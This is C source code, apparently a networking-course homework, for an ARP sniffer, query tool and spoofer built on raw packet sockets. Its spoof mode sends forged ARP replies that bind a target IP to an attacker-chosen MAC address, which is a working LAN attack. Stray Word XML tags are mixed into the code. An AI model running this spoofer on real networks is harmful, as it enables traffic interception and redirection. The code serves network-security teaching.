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//http://reader.roodo.com/thinkingmore/archives/554037.html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&lt;netinet/if_ether.h&gt;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&lt;sys/ioctl.h&gt;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&lt;netpacket/packet.h&gt;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&lt;net/ethernet.h&gt;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&lt;net/if.h&gt;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&lt;arpa/inet.h&gt;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"arp.h"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Change "enp0s3" to your device name (e.g. "eth0"), when you test your hoework.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don't know your device name, you can use "ifconfig" command on Linux.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have to use "enp2s0f5" when you ready to upload your homework.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DEVICE_NAME "enp0s3 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have to open two socket to handle this program.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One for input , the other for output.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if_ip(int *, char*);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if_mac(unsigned char *,char*,int*);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 , char* argv[]){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sockfd_recv = 0, sockfd_send = 0 /*, sockfd_af*/;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opt,datasize,socklen,io;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ifindex=0;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i,j,check=0,spoof_mode_flag=0;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incoming_ip[4],src_ip[4];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buf[1024],incoming_mac[6],src_mac[6];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ip_buf[50];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arp_packet ether_pac,request_pac;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sockaddr_ll sa;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ifreq req;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in_addr myip;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memset(buf,'\0',1024);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socklen = sizeof(sa);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root privilege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if(getuid() != 0 ){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printf("ERROR : You must run this program in root privilege\n");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exit(0);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 ARP sniffer and spoof program ]\n");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//https://wirelessr.gitbooks.io/working-life/content/sockraw_with_tcpdump.html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//PF_PACKET 支援兩個socket type:SOCK_RAW 和 SOCK_DGRAM, SOCK_RAW 會留下完整的 ethernet 標頭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Open a recv socket in data-link layer.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if((sockfd_recv = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))&lt;0){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perror("open recv socket error");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Use recvfrom function to get packet.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recvfrom( ...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Open a send socket in data-link layer.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if((sockfd_send = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) &lt; 0){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perror("open send socket error");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exit(sockfd_send);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Use ioctl function binds the send socket and the Network Interface Card.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  <w:tab/>
        <w:t xml:space="preserve"> * ioctl( ...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get index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//SIOCGIFINDEX把 接口 的 索引 存入 ifr_ifindex.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strncpy(req.ifr_name,DEVICE_NAME,IFNAMSIZ);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if((io=ioctl(sockfd_send,SIOCGIFINDEX,&amp;req))&lt;0){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perror("ioctl");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ifindex = req.ifr_ifindex;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get ip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//SIOCGIFADDR</w:t>
        <w:tab/>
        <w:t xml:space="preserve">獲取接口地址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if((io=ioctl(sockfd_send,SIOCGIFADDR,&amp;req))&lt;0){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perror("ioctl");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myip = ((struct sockaddr_in *)&amp;req.ifr_addr)-&gt;sin_addr;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strcpy(ip_buf,inet_ntoa(myip));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if_ip(src_ip,ip_buf);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//get mac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//SIOCGIFHWADDR使用  ifr_hwaddr讀取  或設置設備的硬件地址。設置硬件地址是特權操作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if((io=ioctl(sockfd_send,SIOCGIFHWADDR,&amp;req))&lt;0){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perror("ioctl");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for(i=0;i&lt;6;i++){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src_mac[i]=req.ifr_hwaddr.sa_data[i];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Fill the parameters of the sa.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sa.sll_family = PF_PACKET;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sa.sll_protocol = ETH_P_ARP;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sa.sll_ifindex = ifindex;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sa.sll_hatype = ARPHRD_ETHER;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sa.sll_pkttype = 0;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//PACKET_OTHERHOST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sa.sll_halen = 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sa.sll_addr[6]=0x00;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sa.sll_addr[7]=0x00;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use sendto function with sa variable to send your packet out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sendto( ... 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//---------SET REQUEST PACKET-----------------//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/*ether header*/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/*eth_des_mac*/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for(i=0;i&lt;6;i++){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request_pac.eth_hdr.ether_dhost[i] = 0xff;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/*eth_src_mac*/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for(i=0;i&lt;6;i++){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request_pac.eth_hdr.ether_shost[i] = src_mac[i];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/*eth_type*/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request_pac.eth_hdr.ether_type = htons(ETH_P_ARP);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/*arp header*/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request_pac.arp.arp_hrd = htons(0x0001);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request_pac.arp.arp_pro = htons(0x0800);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request_pac.arp.arp_hln = 0x06;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request_pac.arp.arp_pln = 0x04;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request_pac.arp.arp_op = htons(0x0001);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for(i=0;i&lt;6;i++){request_pac.arp.arp_sha[i] = src_mac[i];}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for(i=0;i&lt;4;i++){request_pac.arp.arp_spa[i] = src_ip[i];}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//--------------------------------------------//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//check argument h,l,q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if((opt=getopt(argc,argv,"hlq"))!=-1){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switch(opt){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'h':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printf("Format:\n");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printf("(1) ./arp -l -a\n");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printf("(2) ./arp -l &lt;filter_ip_address&gt;\n");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printf("(3) ./arp -q &lt;query_ip_address&gt; \n");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printf("(4) ./arp &lt;fake_Mac_address&gt; &lt;target_ip_address&gt;\n");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exit(0);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'l':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if(argc != 3){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printf("Wrong filter ip address\n");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exit(0);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printf("### ARP sniffer mode ### \n");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if(strcmp(argv[2],"-a") == 0){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while((datasize = recvfrom(sockfd_recv,(char*)&amp;ether_pac,sizeof(ether_pac),0,NULL,NULL))&gt; 0){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if(htons(ether_pac.eth_hdr.ether_type) == 0x806){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printf("get arp :%x\n",(unsigned short)htons(ether_pac.eth_hdr.ether_type));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if(htons(ether_pac.arp.arp_op) == 0x001){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printf("request : who has %d.%d.%d.%d ?   Tell %d.%d.%d.%d\n",ether_pac.arp.arp_tpa[0],ether_pac.arp.arp_tpa[1],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ether_pac.arp.arp_tpa[2],ether_pac.arp.arp_tpa[3],ether_pac.arp.arp_spa[0],ether_pac.arp.arp_spa[1],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ether_pac.arp.arp_spa[2],ether_pac.arp.arp_spa[3]);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}else{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//check argv[2] is an ip address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if_ip(incoming_ip,argv[2]);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//recv argv[2] ip arp packet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while((datasize = recvfrom(sockfd_recv,(char*)&amp;ether_pac,sizeof(ether_pac),0,NULL,NULL))&gt; 0){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if(htons(ether_pac.eth_hdr.ether_type) == 0x806){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printf("get arp :%x\n",(unsigned short)htons(ether_pac.eth_hdr.ether_type));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if(htons(ether_pac.arp.arp_op) == 0x001){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if(ether_pac.arp.arp_tpa[0]==incoming_ip[0] &amp;&amp; ether_pac.arp.arp_tpa[1] == incoming_ip[1]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&amp;&amp; ether_pac.arp.arp_tpa[2]==incoming_ip[2] &amp;&amp; ether_pac.arp.arp_tpa[3] == incoming_ip[3]){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printf("Get ARP packet - who has %d.%d.%d.%d ?   Tell %d.%d.%d.%d\n",ether_pac.arp.arp_tpa[0],ether_pac.arp.arp_tpa[1],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ether_pac.arp.arp_tpa[2],ether_pac.arp.arp_tpa[3],ether_pac.arp.arp_spa[0],ether_pac.arp.arp_spa[1],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ether_pac.arp.arp_spa[2],ether_pac.arp.arp_spa[3]);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}/*else*/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'q':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/*request mode*/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/*send request arp packet*/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if(argc != 3){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printf("Wrong request ip address\n");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exit(0);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printf("### ARP query mode ###\n");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if_ip(incoming_ip,argv[2]);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for(i=0;i&lt;4;i++){request_pac.arp.arp_tpa[i] = incoming_ip[i];}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socklen = sizeof(sa);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if(sendto(sockfd_send,&amp;request_pac,sizeof(request_pac),0,(struct sockaddr *)&amp;sa,(socklen_t)socklen) &lt; 0){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perror("sendto");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//recv reply packet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while((datasize = recvfrom(sockfd_recv,(char*)&amp;ether_pac,sizeof(ether_pac),0,NULL,NULL))&gt; 0 ){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if(htons(ether_pac.eth_hdr.ether_type) == 0x806){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if(htons(ether_pac.arp.arp_op) == 0x002){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printf("MAC address of %d.%d.%d.%d is %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",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ether_pac.arp.arp_spa[0],ether_pac.arp.arp_spa[1],ether_pac.arp.arp_spa[2],ether_pac.arp.arp_spa[3],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ether_pac.arp.arp_sha[0],ether_pac.arp.arp_sha[1],ether_pac.arp.arp_sha[2],ether_pac.arp.arp_sha[3],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ether_pac.arp.arp_sha[4],ether_pac.arp.arp_sha[5]);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exit(0);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exit(0);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/*-----------spoof mode--------------*/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if_mac(incoming_mac,argv[1],&amp;spoof_mode_flag);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if_ip(incoming_ip,argv[2]);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 ==0;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if(spoof_mode_flag ==1){printf("### ARP spoof mode ###\n");}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while(check == 0 &amp;&amp; spoof_mode_flag ==1){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if((datasize = recvfrom(sockfd_recv,(char*)&amp;ether_pac,sizeof(ether_pac),0,NULL,NULL))&gt; 0 ){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if(htons(ether_pac.eth_hdr.ether_type) == 0x806){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if(htons(ether_pac.arp.arp_op) == 0x001){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if(ether_pac.arp.arp_tpa[0] == incoming_ip[0] &amp;&amp; ether_pac.arp.arp_tpa[1] == incoming_ip[1]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&amp;&amp; ether_pac.arp.arp_tpa[2] == incoming_ip[2] &amp;&amp; ether_pac.arp.arp_tpa[3] == incoming_ip[3]){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printf("Get ARP packet : who has %d.%d.%d.%d ?   Tell %d.%d.%d.%d\n",ether_pac.arp.arp_tpa[0],ether_pac.arp.arp_tpa[1],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ether_pac.arp.arp_tpa[2],ether_pac.arp.arp_tpa[3],ether_pac.arp.arp_spa[0],ether_pac.arp.arp_spa[1],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ether_pac.arp.arp_spa[2],ether_pac.arp.arp_spa[3]);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check =1;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if(check ==1){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for(i=0;i&lt;6;i++){request_pac.eth_hdr.ether_dhost[i] = ether_pac.arp.arp_sha[i];}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for(i=0;i&lt;6;i++){request_pac.eth_hdr.ether_shost[i] = src_mac[i];}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for(i=0;i&lt;4;i++){request_pac.arp.arp_spa[i] = ether_pac.arp.arp_tpa[i];}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for(i=0;i&lt;6;i++){request_pac.arp.arp_sha[i] = incoming_mac[i];};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for(i=0;i&lt;4;i++){request_pac.arp.arp_tpa[i] = ether_pac.arp.arp_spa[i];}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for(i=0;i&lt;6;i++){request_pac.arp.arp_tha[i] = ether_pac.arp.arp_sha[i];};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request_pac.arp.arp_op = htons(0x0002);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if(sendto(sockfd_send,&amp;request_pac,sizeof(request_pac),0,(struct sockaddr *)&amp;sa,(socklen_t)socklen) &lt; 0){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perror("sendto");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exit(1);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printf("Send ARP Reply : %d.%d.%d.%d has MAC %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",ether_pac.arp.arp_tpa[0],ether_pac.arp.arp_tpa[1],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ether_pac.arp.arp_tpa[2],ether_pac.arp.arp_tpa[3],request_pac.arp.arp_sha[0],request_pac.arp.arp_sha[1],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request_pac.arp.arp_sha[2],request_pac.arp.arp_sha[3],request_pac.arp.arp_sha[4],request_pac.arp.arp_sha[5]);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 argv[2] is an ip address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if_ip(int *incoming_ip , char* ip){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delim[] = ". \n\t";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*token=0;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for(i=0;i&lt;=4;i++){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if(i==0)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strtok(ip,delim);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if(i&lt;=3){//ip 少於4組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strtok(NULL,delim);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if(token == NULL){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printf("Wrong filter ip address\n");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exit(1);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}else{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strtok(NULL,delim);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if(token != NULL){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printf("Wrong filter ip address\n");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exit(1);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if(i&lt;=3){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if(atoi(token)&gt;=0 &amp;&amp; atoi(token) &lt;256 ){ //檢查是不是在256～0之間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incoming_ip[i]=atoi(token);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printf("Wrong filter ip address\n");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exit(0);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if_mac(unsigned char *incoming_mac,char* mac,int* flag){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*endptr;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delim[] = ": \n\t";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*token=0;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testmac;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for(i=0;i&lt;=6;i++){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if(i==0)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strtok(mac,delim);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if(i&lt;=5){//mac 少於6組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strtok(NULL,delim);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if(token == NULL){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printf("Wrong mac address\n");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exit(1);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}else{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strtok(NULL,delim);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if(token != NULL){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printf("Wrong mac address\n");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exit(1);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if(i&lt;=5){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testmac = strtol(token,&amp;endptr,16);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if(testmac&gt;=0 &amp;&amp; testmac &lt;256 ){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incoming_mac[i] = testmac;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printf("Wrong mac address\n");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exit(0);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*flag = 1;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